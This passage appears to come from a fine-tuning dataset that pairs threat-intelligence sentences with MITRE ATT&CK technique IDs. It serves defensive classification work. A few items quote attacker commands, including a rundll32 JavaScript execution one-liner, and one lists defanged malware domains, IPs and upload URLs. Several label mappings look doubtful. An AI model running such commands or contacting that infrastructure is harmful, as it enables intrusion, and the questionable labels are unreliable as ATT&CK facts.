Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nomadic Octopus used cmd.exe /c within a malicious macro.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has a command to start an interactive shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.### Assistant: T1202: Indirect Command Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL can perform keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attack Overview The attack starts with Microsoft Word documents containing a malicious VBA macro being attached to spear phishing emails### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can spread itself by infecting other remote machines via network shared drives.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has used mshta.exe to download and execute applications from a remote server.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Types of attacks possibly averted include Structured Query Language (SQL) injection, cross-site scripting, and command injection.Use stringent file reputation settings – Tune the file reputation systems of your anti-virus software to the most aggressive setting possible### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SNUGRIDE communicates with its C2 server over HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy has gathered operating system information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has used DNS tunneling for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Backdoor.Oldrea samples contain a publicly available Web browser password recovery tool.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can determine the hostname and linux version on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can list the current running processes on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar gathers information on users.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS copies files with certain extensions from USB devices to a predefined directory.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet PowerDuke runs cmd.exe /c and sends the output to its C2.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry uses vssadmin, wbadmin, bcdedit, and wmic to delete and disable operating system recovery features.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sensitive data can be collected from any removable media connected to the compromised system prior to Exfiltration.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can list and manage startup entries.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has used AES to exfiltrate documents.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can query the Registry on compromised hosts using RegQueryValueExA.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can obtain system information such as OS version and disk space.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound malware can use a SOAP Web service to communicate with its C2 server.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After decompiling it from the PE file, it is heavily obfuscated and still almost unreadable.We deobfuscated the script to understand how the infection process works### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the Component Object Model and Internet Explorer HTML Application pages.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By leveraging Patch System Image, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux uses HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT has a plugin for keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.### Assistant: T1580: Cloud Infrastructure Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun decrypted itself using a single-byte XOR scheme.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning and SMB Relay, can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use VBA to perform execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has the ability to use HTTPS for C2 communiations.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,tfvn[.]com[.]vnshirkeswitch[.]netguideofgeorgia[.]orggulfclouds[.]sitejhssourcingltd[.]comkamagra4uk[.]compioneerfitting[.]compositronicsindia[.]comscseguros[.]ptspldernet[.]comtoshioco[.]comwww[.]happytohelpyou[.]inIP addressesThe following IP addresses have been observed to be associated with malware campaigns.112.213.89[.]4067.23.254[.]6162.212.33[.]98153.92.5[.]124185.117.22[.]19723.94.188[.]24667.23.254[.]17072.52.150[.]218148.66.136[.]62107.180.24[.]253108.179.246[.]13818.221.35[.]21494.46.15[.]20066.23.237[.]18672.52.150[.]218URLs:The following URLs have been observed to be associated with malware campaigns.https[:]//a[.]pomf[.]cat/http[:]//pomf[.]cat/upload[.]php### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME has used a malicious Word document for delivery with VBA macros for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike will timestomp any files or payloads placed on a target machine to help them blend in.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Net Crawler uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf uses custom base64 encoding to obfuscate HTTP traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ajax Security Team has used personalized spearphishing attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's identity that can be used during targeting.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has the ability to set folders or files to be hidden from the Windows Explorer default view.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The COR_PROFILER environment variable can be set at various scopes resulting in different levels of influence.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,iKitten saves itself with a leading "".""### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has collected the username of the victim system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage has the ability to download and execute additional payloads via a DropBox API.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may buy, steal, or download malware that can be used during targeting.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,creates a backdoor through which remote attackers can open a command-line interface.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has used HTTP in communications with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, Apple Remote Desktop on macOS is native software used for remote management.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has run ipconfig /all on a victim.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun executed commands using cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Word document delivering TYPEFRAME prompts the user to enable macro execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CCBkdr can use a DGA for Fallback Channels if communications with the primary command and control server are lost.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon can download an executable to run on the victim.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon encrypts data using Base64 before being sent to the command and control server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment .### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can retrieve the internal IP address of a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows Event Logs are a record of a computer's alerts and notifications.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Flame has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.### Assistant: T1011: Exfiltration Over Other Network Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used valid credentials with various services during lateral movement.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout can use protocol handlers to coax the operating system to send NTLMv2 authentication responses to attacker-controlled infrastructure.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 created a Scheduled Task/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may develop exploits that can be used during targeting.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Final1stspy obtains a list of running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has created a scheduled task to launch an executable every 10 minutes.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has manipulated timestamps for creation or compilation dates to defeat anti-forensics.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in Revert Cloud Instance where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SynAck enumerates all running services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Skidmap has the ability to check if /usr/sbin/setenforce exists.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has used TCP for C2.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT-C-36 has embedded a VBScript within a malicious Word document which is executed upon the document opening.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop can use code signing to evade detection.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has exploited vulnerabilities to gain execution including CVE-2017-11882 and CVE-2020-0674.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, a Turla custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When creating a user, you can specify the userID for that account.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth uses the LoadLibraryExW function to load additional modules.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,T9000 gathers and beacons the system time during installation.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These methods can differ from platform-as-a-service , to infrastructure-as-a-service , or software-as-a-service .### Assistant: T1526: Cloud Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WellMess has used Base64 encoding to uniquely identify communication to and from the C2.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects a list of files and directories in C:\ with the command dir /s /a c:\ >> ""C:\windows\TEMP\RANDOM.tmp"".### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty runs ipconfig /all and collects the domain name.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has compromised domains for use in targeted malicious campaigns.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has created accounts on multiple compromised hosts to perform actions within the network.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework., LogMeing ### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of Attor's plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon uploads files and data from a compromised host over the existing C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel has collected the DNS address of the infected host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has used mshta.exe to execute a HTA payload.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may use at in Linux environments to execute programs at system startup or on a scheduled basis for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has collected the computer name from the infected host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A file name may include a secondary file type extension that may cause only the first extension to be displayed .### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis also used the Wow64SetThreadContext API as part of a process hollowing process.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may develop malware and malware components that can be used during targeting.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL can enumerate registry keys.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can inject into known, vulnerable binaries on targeted hosts.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also has commands to obtain information about logical drives, drive type, and free space.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware proceeds to decrypt and embedded configuration of 128 bytes using a simple XOR routine### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK may store RC4 encrypted configuration information in the Windows Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,~/.bashrc ### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Log.php validates the sender by User-Agent, saves the data in the “UP” server directory and stores the metadata in the mssql database for later reference### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has the ability to search for files on the compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To get a job from the Google Drive account, the Trojan starts by creating a string that has the following structure with each element within the subdomain subjected to the number to character substitution from Table 4: cc. The Trojan will then obtain an OAUTH access token to the Google Drive in the same manner as before when obtaining the unique identifier### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has uploaded and downloaded files to utilize additional plugins.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After re-establishing access to a victim network, Threat Group-3390 actors download tools including gsecdump and WCE that are staged temporarily on websites that were previously compromised but never used.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can create a scheduled task to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke has the ability to execute PowerShell scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor has been signed with valid certificates to evade detection by security tools.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 uses HTTPS to conceal C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak enables concurrent Remote Desktop Protocol sessions.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 leverages social networking sites and cloud platforms for C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware that can collect the victim’s OS version and machine name.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity has created new services and modified existing services for persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is used to create new processes, perform as a command line shell, and several other tasks### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can spread within a network via the BlueKeep and EternalBlue vulnerabilities in RDP and SMB respectively.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following capabilities have been observed in this payload: Get drive information Modify files Modify directories Modify registry Spawn process Terminate process Modify services Kill self Ties to SunOrcal Reaver was used concurrently with SunOrcal over the past year, to include two Reaver samples dropped from zip files hosted on a domain also being used as a SunOrcal C2 (www.fyoutside[.]com), and there is also passive DNS overlap amongst the C2s### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can encrypt files on victim systems and demands a ransom to decrypt the files.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Organizations that Buckeye targeted over time, per region Malware and tools Buckeye uses a number of hacking tools as well as malware### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These credentials include both x509 keys and passwords.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Uroburos is a rootkit used by Turla.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can be done using a syntax similar to this: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write;GetObject"" This behavior has been seen used by malware such as Poweliks.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has been executed through luring victims into opening malicious documents.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker can perform a UAC bypass if it is not executed with administrator rights or if the infected host runs Windows Vista or later.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk can create .dll files that actually contain a Rich Text File format document.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has collected e-mail addresses from targeted organizations from open Internet searches.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NDiskMonitor uses AES to encrypt certain information sent over its C2 channel.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used Scheduled Tasks for persistence and to load and execute a reverse proxy binary.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition it will break large data sets into smaller chunks for exfiltration.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KeyBoy uses custom SSL libraries to impersonate SSL in C2 traffic.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After this file is copied, the original ‘Update.~tmp’ file is deleted### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT has masqueraded as VMware.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has encrypted and stored its orchestrator code in the Registry as well as a PowerShell script into the WsqmCons Registry key.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has used rundll32.exe to execute a loader.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The command handle looks for the following command strings in Table 3: Command Description $fileDownload Uploads the contents of a specified file to C2 $importModule Adds a specified PowerShell module to the current script $screenshot Executes the contents of the command, which should be the string ‘$screenshot’### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can sniff network traffic to look for packets matching specific conditions.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHTRACK is loaded and executed by a highly obfuscated launcher.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Firewall rules may also already exist to permit traffic to these services.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally it checks to determine if common analysis tools are currently running on the infected system### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has used a custom routine to decrypt strings.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is possible to extract passwords from backups or saved virtual machines through OS Credential Dumping.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT uses the email platform, Naver, for C2 communications, leveraging SMTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of the first steps that several Mosquito installer packages performed after writing 